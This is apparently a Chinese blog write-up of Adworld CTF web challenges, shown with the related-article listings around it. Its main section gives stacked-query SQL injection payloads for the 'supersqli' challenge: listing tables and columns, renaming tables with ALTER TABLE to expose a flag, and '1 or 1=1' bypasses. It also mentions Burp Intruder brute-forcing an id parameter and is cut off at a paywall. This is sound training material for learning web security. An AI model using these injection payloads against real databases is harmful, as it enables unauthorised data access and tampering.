网络攻防世界

最新推荐文章于 2024-05-23 14:45:00 发布
最新推荐文章于 2024-05-23 14:45:00 发布
阅读量299 收藏
点赞数
分类专栏: 小白学习 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tricker2/article/details/107711696
版权

本次来个十连总结
supersqli
利用的是sql注入
在这里插入图片描述
利用alter修改表结构。?inject=-1’;show tables;–+
在这里插入图片描述

1.首先查看字段,
-1’;show columns from 1919810931114514 --+
-1’;show columns from words --+
由上面的探测我们可以猜测出这里会查询出words表的data列的结果。也就是类似于下面的sql语句:
select * from words where id = ‘’;
2.我们将表1919810931114514名字改为words,flag列名字改为id,那么就能得到flag的内容了。
修改表名和列名的语法如下:
修改表名(将表名user改为users)alter table user rename to users;
修改列名(将字段名username改为name)alter table users change uesrname name varchar(30);
3.最终payload如下:
1’; alter table words rename to words1;alter table 1919810931114514 rename to words;alter table words change flag id varchar(50);#
拆分开来如下:
1’;
alter table words rename to words1;
alter table 1919810931114514 rename to words;
alter table words change flag id varchar(50);

4.然后使用1’ or 1=1#即可查询出flag在这里插入图片描述
02
在这里插入图片描述
打开网址 ,根据题意点开报表中心(因为其他的点开都一样,不信你试试)
会看见url栏里的id =1(截图没截好)想到burp爆破id所以打开burp抓包
代理里找到URL请求然后传到 intruder
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
03
在这里插入图片描述
打开源代码

最低0.47元/天 解锁文章
2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
2401_84302722的博客
05-01 449
【代码】2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
网络世界里的攻防
yuanchuanghhhh的专栏
05-31 573
<br /> <br /><br /> <br />01:07:00[分享]网络世界里的攻防战<br /> <br /> <br /> <br />http://video.sina.com.cn/v/b/40526064-1295295664.html
攻防世界-Web 简单入门-No.1
pone2233的博客
07-11 1965
文章目录比赛地址view_sourceget_postrobotsbackupcookiedisabled_buttoncyberpeace{23286d5010dee15644e560dabf702614}weak_authcommand_executionsimple_phpxff_refererwebshellsimple_js 比赛地址 攻防世界 :https://adworld.xctf.org.cn/ view_source 按F12检查一下就找到了flag get_post 这个简单
2024年最全攻防世界Web题 - unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 586
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
网络安全】攻防世界web new bird区前十个靶场
ZYP_997_的博客
01-17 4846
攻防世界第一天 攻防世界web new bird区前十个靶场 攻防世界web new bird区的前十个靶场 1、第一题:view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目解析:题目要求我们查看一个网页的源代码,并且已知鼠标右键不能使用,即需要我们使用其他方法来查看网页源代码。 题目解答: 1、方法一 首先我们点击”点击获取在线场景“,然后加载结束后点击网址进行跳转,会显示如下图,接下来按F12,查看网页源代码,然后找到FLAG,即可通关。
fileinclude网络攻防世界
01-13
### 网络攻防技术资料和资源 #### 分布式技术在网络攻击中的应用 分布式技术既可用于构建稳定可靠的服务架构,也可能成为发动大规模网络攻击的工具。当这些技术落入恶意之手时,可以形成强大的僵尸网络,利用大量受...
upload1网络攻防世界 不用蚁剑
最新发布
02-13
### 网络攻防技术与方法 #### 工具选择 对于网络攻防而言,有许多替代蚁剑的选择可用于执行安全评估和渗透测试。例如,Burp Suite是一个非常流行的安全工具,专门设计用于攻击Web应用程序[^4]。 #### 渗透测试流程...
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界web新手区
渺小
02-15 1032
攻防世界web区新手区
攻防世界WEB(一)
tomyyyyy
10-28 1833
攻防世界WEB 目录攻防世界WEB1.baby_web2.Training-WWW-Robots3.unserialize34.Web_php_unserialize5.php_rce6.Web_php_include7.supersqli8.ics-069.warmup10.NewsCenter11.NaNNaNNaNNaN-Batman12.web213.PHP214.upload115.W...
[CTF_网络安全] 攻防世界 simple_js 解题详析
qingkahui24689的博客
05-23 2248
[CTF_网络安全] 攻防世界 simple_js 解题详析,该题考察Javascript代码的解读及不同数值类型的转换姿。我们下次见,
网络安全人士必备的16个威胁情报分析网站
Python_paipai的博客
02-20 1万+
SIC定位于企业本地化数字风险与威胁情报管理平台,致力于帮助用户实现多源情报接入、聚合、管理、共享与应用,并完成自身面临的钓鱼欺诈网站/APP/社媒等数字风险的落地与处置,帮助企业全面感知外部风险,建立私有情报视图,同时SIC可与天际友盟威胁情报网关TIG产品或用户自有安全产品进行衔接联动,为用户提供TI Feed和TI Lookup双模式情报应用能力,精细情报管理应用,提升威胁检测与处置效能,助力企业构建本地化的情报运营体系,打造智能安全运营。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
攻防世界——web新手和引导模式(全解)
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
九大全球网络攻击实时追踪系统盘点
热门推荐
xysoul的专栏
01-22 3万+
关注网络安全的小伙伴们每天都在关注着世界上每时每刻都在发生的网络攻击事件。也许你很难想象全球范围内所有攻击活动进行时的壮观场景,也很难了解网络攻击和攻击背后的组织是怎样的……那么本文将带你一览无余。 科普:攻击数据从何而来? 这是一些很形象、生动、有趣的攻击可视化记录。所有在地图上展示的大数据都是来自真实的生活目标、“蜜罐”和安全公司部署的“诱饵系统”收集的数据,其中有攻击来源、攻击方
攻防世界 web robots
Kni9hT's Blog
02-27 1885
终于见到了一个协议了!!! 题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 通过题目描述就知道这题要用到robots协议,所以百度一下。 robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不应被搜索引擎的漫游器...
网络攻防网站
寂寞灵魂
11-09 2679
著作权归作者所有。 商业转载请联系作者获得授权,非商业转载请注明出处。 作者:周知日 链接:http://www.zhihu.com/question/24740239/answer/28872069 来源:知乎 DVWA: Damn Vulerable Web Application DVWA - Damn Vulnerable Web Application 基于 p
攻防世界杂项 SimpleRAR
hhh
05-07 9692
SimpleRAR 现在这年头做个杂项还顺便教PS的嘛(手动微笑 ----------------------------------------------------------------------------------------------正经的分割线 附件是一个RAR压缩包,解压缩之后只有一个txt文件,上面写着: (RAR:可把我给牛逼坏了 然后……例行用w...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值